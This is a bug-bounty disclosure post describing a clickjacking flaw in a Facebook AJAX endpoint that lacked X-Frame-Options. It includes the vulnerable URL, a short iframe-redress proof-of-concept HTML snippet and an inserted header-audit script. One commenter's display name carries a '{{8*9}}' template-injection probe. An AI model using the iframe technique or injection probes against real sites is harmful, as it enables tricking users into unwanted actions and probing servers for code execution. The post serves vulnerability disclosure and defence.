Facebook ClickJacking – How we put a new dress on Facebook UI


Hi Bug Hunters,

Today we will explain how we redressed the Facebook UI and made it easy to fool a victim into, for example, adding the attacker as a member of one of the victim's own secret groups on Facebook.

Here are some details about the issue:


Vulnerability Type:

ClickJacking

The vulnerable URL:
https://www.facebook.com/ajax/home/generic.php?dpr=1&sidecol=true&path=/groups/559357440894888/&endpoint=/ajax/home/generic.php&__user=100000152886101&__a=1&__dyn=&__req=jsonp_8&__be=0&__pc=EXP1:DEFAULT&__rev=2286573&__cid=

Where:
1. 559357440894888 is the targeted resource (group).
2. 100000152886101 is the targeted user who owns the resource. It is just a parameter value sent along with the first GET request so that it is included in the form action, which lets the request complete successfully.

The problem:
When this endpoint (/ajax/home/generic.php) is called with a client-side Facebook path (path=) related to a Facebook resource (pages, groups, etc.), the resource lacks the "X-Frame-Options" header and becomes iframable. All the actions inside the iframable response depend on another resource that has not been loaded and is needed to complete their AJAX requests, but luckily we found that the iframable response contains some forms that the victim is able to submit.
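The missing-header condition described above can be audited from response headers alone. The following is an added example (not part of the original post and not Facebook's code) that classifies a response the way current browsers treat X-Frame-Options and CSP frame-ancestors; the sample responses and the /hypothetical/ paths are constructed, and it assumes a single policy per Content-Security-Policy header.

```python
# Added example: how current browsers treat a response's anti-framing headers.
XFO_KEYWORDS = {"DENY", "SAMEORIGIN", "ALLOWALL"}

def frame_ancestors(csp):
    """Return the frame-ancestors source list of a CSP value, or None if absent."""
    for directive in (csp or "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def framing_policy(headers):
    """Return (verdict, reason); verdict is 'blocked', 'restricted' or 'frameable'."""
    h = {k.lower(): v for k, v in headers.items()}
    sources = frame_ancestors(h.get("content-security-policy"))
    if sources is not None:
        # An enforced frame-ancestors directive makes browsers skip X-Frame-Options.
        if not sources or sources == ["'none'"]:
            return "blocked", "CSP frame-ancestors matches no origin"
        if any(s in ("*", "http:", "https:") for s in sources):
            return "frameable", "CSP frame-ancestors allows any origin"
        return "restricted", "CSP frame-ancestors " + " ".join(sources)
    xfo = h.get("x-frame-options", "")
    values = {v.strip().upper() for v in xfo.split(",") if v.strip()}
    if not values:
        return "frameable", "no X-Frame-Options and no CSP frame-ancestors"
    if values == {"DENY"} or (len(values) > 1 and values & XFO_KEYWORDS):
        return "blocked", "X-Frame-Options DENY or conflicting keywords"
    if values == {"SAMEORIGIN"}:
        return "restricted", "X-Frame-Options: SAMEORIGIN"
    # ALLOW-FROM and unknown values are ignored, so the header gives no protection.
    return "frameable", "X-Frame-Options value ignored: " + xfo

# Constructed sample responses, not captured traffic; /hypothetical/ paths are made up.
SAMPLES = {
    "/ajax/home/generic.php": {"Content-Type": "text/html"},
    "/hypothetical/deny": {"X-Frame-Options": "DENY"},
    "/hypothetical/allow-from": {"X-Frame-Options": "ALLOW-FROM https://example.com"},
    "/hypothetical/csp": {"X-Frame-Options": "ALLOW-FROM https://example.com",
                          "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
}

def frameable_paths(samples):
    """Paths whose responses any third-party page could load in an iframe."""
    return sorted(p for p, hdrs in samples.items() if framing_policy(hdrs)[0] == "frameable")

if __name__ == "__main__":
    for path, hdrs in SAMPLES.items():
        print(path, *framing_policy(hdrs))
```

Running the same check over every AJAX and fragment endpoint, not only full pages, is what catches a response like the one in this report.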

The PoC Impact:
Fooling a victim into adding a specific user to a targeted secret group or even any other resource!

PoC Code (in case you need it):
<!-- The outer div clips the framed page to a 145x28 px window; the iframe offsets choose which part of the page shows through. -->
<div style="overflow: hidden; width: 145px; height: 28px; position: relative;">
<iframe src="URL" style="border: 0pt none; left: -7px; top: -807px; position: absolute; width: 1406px; height: 1321px;" scrolling="no"></iframe></div><br>

PoC Video:


  • Srujan Arju

    Great find! Congrats! I wonder how much they rewarded you?

  • Hidalgo Perez Francesco{{8*9}}

    Hi sir, nice find, can I know how much they rewarded you? Like $5k, right? Thanks!